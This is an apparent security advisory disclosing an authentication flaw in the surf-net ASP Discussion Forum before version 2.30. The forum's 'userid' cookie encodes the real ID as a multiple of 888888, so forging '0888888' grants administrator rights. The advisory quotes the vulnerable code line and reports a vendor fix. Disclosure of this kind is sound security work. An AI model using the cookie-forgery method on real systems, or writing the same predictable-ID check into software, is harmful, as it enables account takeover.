security problem in surf-net ASP Discussion Forum < 2.30

[Mark Lastdrager <mark () pine nl>]

Problem:
--------

The free surf-net ASP forum which is downloadable at
http://www.surf-net.co.uk/asp/forum/forum_script.asp contains at least one
major security hole which can be easily exploited by a malicious user.
Problem was discovered during a website audit.

Impact:
-------

Anyone can become the administrator of the message board.

Description:
------------

The forum sets a cookie 'userid' as soon as a user logs on (if the user
prefers cookies). This cookie seems a representation of some kind of the
real userid. When auditing, we first got a cookie with userid '2666664'
(with real userid 3, registration page returns this number), and after we
registered a second userid '3555552' (with real userid 4) it wasn't hard
to guess that the admin user would have the userid '0888888' (thus real
userid 1). After changing the local cookie and restarting Netscape it
turned out we were right.

After that we found and downloaded the sourcecode and discovered this at
line 89 of common.inc:

 lngLoggedInUserID = CLng(Request.Cookies("Forum")("UserID") / 888888)

Which ofcourse is not a very secure way of doing things ;-)

Solution:
---------

Author reacted within one day and fixed the problem. Fixed version 2.30
should be available at
http://www.surf-net.co.uk/asp/forum/forum_script.asp.

Mark Lastdrager

--
Pine Internet BV ::  tel. +31-70-3111010 ::  fax. +31-70-3111011
PGP 92BB81D1 fingerprint 0059 7D7B C02B 38D2 A853 2785 8C87 3AF1
Today's excuse: Forced to support NT servers; sysadmins quit.